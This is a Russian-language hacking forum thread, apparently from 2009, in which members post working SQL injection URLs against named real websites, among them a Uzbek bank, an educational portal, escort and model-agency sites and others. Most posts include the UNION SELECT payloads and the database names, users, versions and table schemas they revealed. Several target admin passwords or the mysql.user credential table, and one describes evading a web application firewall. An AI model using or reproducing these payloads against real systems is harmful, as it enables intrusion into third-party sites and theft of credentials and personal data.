08.12.2009, 22:41
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
edu
http://construct.edu.ru/news.php?id=-56+union+select+1,2,group_concat(0x0b,column_name) ,4,5,6,7,8+from+information_schema.columns+where+t able_name=0x6262665f7573657273
(phpBB) bbf_users:: id,username,user_password
http://construct.edu.ru/news.php?id=-56+union+select+1,2,concat_ws(0x3a,user_id,0x3a,us ername,0x3a,user_password),4,5,6,7,8+from+bbf_user s+limit+1,1
Administrator
логинилка в форумах
MySQL 5.1.39-log
|
|
|
10.12.2009, 17:16
|
|
Новичок
Регистрация: 26.11.2009
Сообщений: 20
С нами:
8662587
Репутация:
60
|
|
-1-
Target : http://www.freestyleagency.eu
Exploit:http://www.freestyleagency.eu/model-mail.php?type=Video&id=97+AND+1=2+UNION+SELECT+0,n ull,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23--
Database : freestyl_freestyle
User : freestyl_agency@localhost
Version : 5.0.85-community-log
Contain :[0]admin: IdAdmin,UserAdmin,PassAdmin,EmailAdmin,StatusAdmin
[1]models: model_id,first_name,last_name,height,bust_chest,cu p_size,waist,hips,eye_color,hair_colour,hair_lengt h,shoe_size,size,text,card_big,card_s1,card_s2,car d_s3,card_s4,type_id,status,count,date_added,last_ modified
[2]news: news_id,title,content,status,date_added,last_modif ied
[3]type: type_id,type
Example:
http://www.freestyleagency.eu/model-mail.php?type=Video&id=97+AND+1=2+UNION+SELECT+0,c oncat_ws(0x3a,UserAdmin,PassAdmin),2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ad min--
-2-
Target : http://www.web0668.net
Exploit:http://www.web0668.net/url.php?id=149+AND+1=2+UNION+SELECT+0,null,2--
Database : sq_web0668
User : sq_web0668@125.65.112.47
Version : 5.0.45-community-nt-log
Contain :[0]web_ad: ad_id,ad_size,ad_name,ad_time,ad_url,ad_img
[1]web_admin: admin_id,admin_name,admin_password,admin_type
[2]web_cate: cate_id,cate_name,cate_cate,cate_asc
[3]web_file: file_id,file_about,file_cooperrtion,file_ad
[4]web_hot: hot_id,hot_cate,hot_name,hot_url,hot_img,hot_bz,ho t_views,hot_time
[5]web_links: link_id,link_name,link_color,link_abc,link_url,lin k_img,link_views,link_cate,link_back,link_bz,link_ time,link_type,link_disp
[6]web_mess: ms_id,ms_title,ms_content,ms_user,ms_time,ms_backt ime,ms_views,ms_type,ms_cate
[7]web_ncate: ncate_id,ncate_name,ncate_cate,ncate_asc
[8]web_new: new_id,new_name,new_url,new_views,new_time
[9]web_pl: pl_id,pl_name,pl_content,pl_class,pl_time
[10]web_rank: rank_id,rank_name,rank_url,rank_views,rank_time
[11]web_sys: sys_id,sys_webname,sys_username,sys_tel,sys_fax,sy s_qq,sys_email,sys_address,sys_copyright,sys_websi te,sys_icp
[12]web_txtad: adtxt_id,adtxt_name,adtxt_time,adtxt_url
Example:
http://www.web0668.net/url.php?id=149+AND+1=2+UNION+SELECT+0,concat_ws(0x 3a,admin_name,admin_password),2+from+web_admin--
-3-
Target : http://www.somethingyoushouldread.com
Exploit:http://www.somethingyoushouldread.com/mail/mail.php?id=159+AND+1=2+UNION+SELECT+null,1--
Database : benberkon
User : benberkon@97.74.144.144
Version : 4.1.22-max-log
Contain :[0]admin: id,name,pass
...
Example:
http://www.somethingyoushouldread.com/mail/mail.php?id=159+and+1=2+union+select+concat_ws(0x3 a,name,pass),1+from+admin--
AdminPanel:
http://somethingyoushouldread.com/upload/login/login.php
|
|
|
|
11.12.2009, 00:36
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Код:
http://karendodsonmurals.com/girls.php?id=-51+union+select+1,2,table_name,4,5,6+from+information_schema.tables+--+&pic=0
Код:
http://www.honeyzescorts.co.uk/girls.php?id=6+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
Код:
http://www.sportsbikes.org/girls.php?Blonde%20babe%20in%20lingerie%20with%20suzuki&id=-8+union+select+1,2,3,concat_ws(0x3a3a,username,password,email),5,6,7,8,9+from+members+where+type=0x61646D696E+/*+
Код:
http://www.carbabewallpapers.com/view.php?id=-79+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+/*+
Код:
http://www.video-spezial.de/start-girls.php?id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user+--+
Код:
http://www.janinescort.com/girls.php?lang=en&id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+/*+
Код:
http://www.jessys-girls.ch/girls.php?cmd=show&id=-18+union+select+1,unhex(hex(table_name)),3+from+information_schema.tables+--+
Последний раз редактировалось DezMond™; 11.12.2009 в 00:47..
|
|
|
|
12.12.2009, 03:47
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
С нами:
9107354
Репутация:
122
|
|
Код:
http://www.lunapack.com.ua/news.php?id=56+and+1=0+Union%20Select%20%201,2,3,version%28%29%20,5
Version = 5.0.88-log
Database = serkin_lunapack
User = serkin_lunapack@first.hosted.in
Код:
http://miniaturebottles.com/MMBC_guestbook/view.php?id=511+and+1=0+Union%20Select%20%201,UNHEX%28HEX%28version%28%29%29%29%20,3,4,5,6,7
Version = 4.1.25-log
User = a0008864@69.12.112.22
Database = a0008864-2
Tables  assword, contacts
Columns: Table password:username ,id, userpass
Последний раз редактировалось TELO; 12.12.2009 в 04:41..
|
|
|
|
12.12.2009, 06:09
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
С нами:
10461853
Репутация:
178
|
|
Галлабанк
http://qishloqqurilishbank.uz/ru/index.php
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,database%28%29,3,4,5,6,7,8,9,10--
qqb
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema=0x717162--
branch 0x6272616E6368
deposit 0x6465706F736974
exchange
m_transfer
minibank 0x6D696E6962616E6B
news
presssa
s_office 0x735F6F6666696365
valuta
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x735F6F6666696365--
id
branch_id
so_adres
language
date_rec
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6272616E6368--
id
branch_mfo
branch_name
phone_num
address
language
date_rec
per_n
tr
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6D696E6962616E6B--
id
branch_id
mb_name
mb_adres
language
date_rec
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6465706F736974--
id
type_currency
name_deposit
type_deposit
period,percent
first_deposit
general_conditions
activ
language
cur_date
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-1+UNION+SELECT+1,group_concat(id,0x3A,type_currency,0x3A,name_deposit,0x3A,type_deposit,0x3A,period,0x3A,percent,0x3A,first_deposit,0x3A,general_conditions,0x3A,activ,0x3A,language,0x3A,cur_date,0x3A),3,4,5,6,7,8,9,10+FROM+qqb.deposit--
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-1+UNION+SELECT+1,group_concat(user,0x3A,password),3,4,5,6,7,8,9,10++FROM+mysql.user--
Последний раз редактировалось jokester; 12.12.2009 в 11:22..
Причина: пароли
|
|
|
|
13.12.2009, 17:19
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами:
9431076
Репутация:
229
|
|
designerpreviews.com PR-3
Данные передаем постом, ибо стоит злобный WAF
Код:
http://www.designerpreviews.com/index.php?sec=-4/**/union/**/select/**/1,2,3,4,5,6,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,8,9,10+--+
Код:
5.0.81-community:designer_briank@localhost:designer_db
ottosshrunkenhead.com PR-4
Также инъектим постом
Код:
http://www.ottosshrunkenhead.com/php/eventsdbm.php?event_id=-1+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,2,3,4,5,6,7,8+--+&cmd=edit&type=1
Код:
5.0.81-community:ottosshr_otto@localhost:ottosshr_odb
equinesavior.com PR-3
POST
Код:
http://equinesavior.com/phpclassifieds/index.php?catid=7+UnIon+SeLeCt+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17+--+&catname=General%20Merchandise
Код:
5.0.81-community:equinesa_owner@localhost:equinesa_phpclass
|
|
|
|
13.12.2009, 18:07
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
http://lancia.ro/noutati.php?id=-38+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9
Database version: 5.0.85-community
Database name: lancia2_content2
Database user: lancia2_admcon@localhost
Os: pc-linux-gnu
|
|
|
|
13.12.2009, 23:30
|
|
Участник форума
Регистрация: 28.11.2008
Сообщений: 281
С нами:
9184072
Репутация:
242
|
|
http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+s elect+1,2,concat_ws(0x3a,version(),database(),user (),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57
5.0.22
monterra
root@localhost
redhat-linux-gnu
http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+s elect+1,2,id,4,5,email,password,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57+from+users
|
|
|
|
14.12.2009, 02:06
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Код:
http://www.aeria.ma/news.php?id=-1+union+select+1,concat_ws%28user%28%29,version%28%29,database%28%29,@@version_compile_os%29--
user:aeria@209.62.86.68:
version:5.0.84-percona-highperf-b18-log:
database:aeria:
OS:unknown-linux-gnu
Код:
http://www.businessexperts.ma/businessexperts/details-news.php?id=-8+union+select+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,5,6,7,8,9--
user:ahmani@localhost:
version:5.0.45:
database:businessexperts:
OS:redhat-linux-gnu.
Код:
http://www.alexnursing.edu.eg/news.php?id=-14+union+select+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,3,4,5--
user:alexnurs_nw@localhost:
version:5.0.85-community:
database:alexnurs_ndb:
OSc-linux-gnu |
|
|
|
14.12.2009, 08:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
http://www.pscs.ru/index.php?link=1&id=-86+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3+--+
User: pscsru_pscs@localhost
Database: pscsru_pscs
Version: 5.0.67-community
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
